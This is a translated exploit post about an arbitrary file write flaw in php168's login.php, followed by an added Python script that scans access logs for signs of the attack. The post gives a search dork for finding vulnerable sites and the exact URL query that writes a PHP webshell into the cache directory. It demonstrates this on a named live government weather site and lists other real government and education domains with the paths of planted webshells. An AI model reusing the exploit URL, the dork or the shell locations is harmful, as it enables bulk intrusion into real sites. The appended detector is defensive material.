This is a serious problem and is best not ignored. The exploit code inserts a PHP Trojan into the cache/ directory, which makes it easy to get a webshell, and it can be done in bulk.
Use a search engine to search for "Powered by php168 v6", or any of the versions v5, v4, v3, v2, v1, and many related sites will turn up.
The vulnerability is caused by the login.php file not strictly filtering its variables, so rather than finding ways to crack a password, the "one-sentence Trojan", the tool hackers use to get a website webshell, is simply written to the website.
We just pick a website to test with: the Texas Weather Service.
After its domain name, append this code: login.php?makehtml=1&chdb[htmlname]=tick.php&chdb[path]=cache&content=. This code uses the login.php file to write the supplied content to the file tick.php in the site's cache directory, cache. “ ” is the server side of the one-sentence Trojan.
Then the URL is http://www.dzqxj.com/login.php?makehtml=1&chdb[htmlname]=tick.php&chdb[path]=cache&content=
Then press Enter.
If the page jumps to the login screen, the Trojan may have been written to the cache directory.
Now we visit the Trojan's address to take a look: http://www.dzqxj.com/cache/wooyun.php
OK, nothing is displayed, which indicates that the one-sentence Trojan was written successfully. We connect with the tool to take a look.
The webshell is obtained successfully.
You can also directly upload a larger, full-featured webshell; I will not demo that.
Other sites also have the vulnerability, and a lot of them are government and education sites.
http://lib.xjau.edu.cn/cache/wooyun.php password: * (do not publish)
http://www.stepdo.com/cache/wooyun.php password: **** (do not publish)
Vulnerability fix: upgrade the version.
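
For a site owner who needs to know whether the site was hit before the upgrade, here is an added example (not part of the original post) that scans web access logs for the request pattern described above: a login.php request carrying makehtml and a chdb[htmlname] that names a script, and a script under cache/ being requested directly. It assumes combined-format access logs; the function names and the sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request part of a combined-format log line: "METHOD target HTTP/x.y" status
REQ = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+" (\d{3})')
SCRIPT_EXT = re.compile(r'\.(?:php\d?|phtml|phar)$', re.I)

def classify(line):
    """Return 'write-attempt', 'cache-script-hit' or None for one log line."""
    m = REQ.search(line)
    if not m:
        return None
    target, status = m.group(1), m.group(2)
    url = urlsplit(target)
    path = url.path.lower()
    # parse_qs percent-decodes keys, so chdb%5Bhtmlname%5D matches too.
    params = parse_qs(url.query, keep_blank_values=True)
    if path.endswith('/login.php') and 'makehtml' in params:
        names = params.get('chdb[htmlname]', [])
        if any(SCRIPT_EXT.search(n.strip()) for n in names):
            return 'write-attempt'
    # Assumption: the application never serves pages from cache/ directly,
    # so a script answering 200 there deserves a manual look.
    if '/cache/' in path and SCRIPT_EXT.search(path) and status == '200':
        return 'cache-script-hit'
    return None

def scan(lines):
    """Return (line_number, finding) pairs for every flagged line."""
    return [(i, c) for i, line in enumerate(lines, 1) if (c := classify(line))]

# Constructed sample log lines (documentation IP addresses, placeholder content).
SAMPLE = [
    '192.0.2.10 - - [01/Jan/2012:10:00:00 +0800] "GET /login.php HTTP/1.1" 200 5120',
    '192.0.2.77 - - [01/Jan/2012:10:01:00 +0800] "GET /login.php?makehtml=1'
    '&chdb%5Bhtmlname%5D=x.php&chdb%5Bpath%5D=cache&content=PLACEHOLDER HTTP/1.1" 302 0',
    '192.0.2.77 - - [01/Jan/2012:10:01:05 +0800] "GET /cache/x.php HTTP/1.1" 200 0',
    '192.0.2.10 - - [01/Jan/2012:10:02:00 +0800] "GET /cache/index.htm HTTP/1.1" 200 900',
]

if __name__ == '__main__':
    for lineno, kind in scan(SAMPLE):
        print(lineno, kind)
```

A request sent by POST leaves no query string in the log, so a clean scan does not replace checking the cache directory itself for unexpected script files.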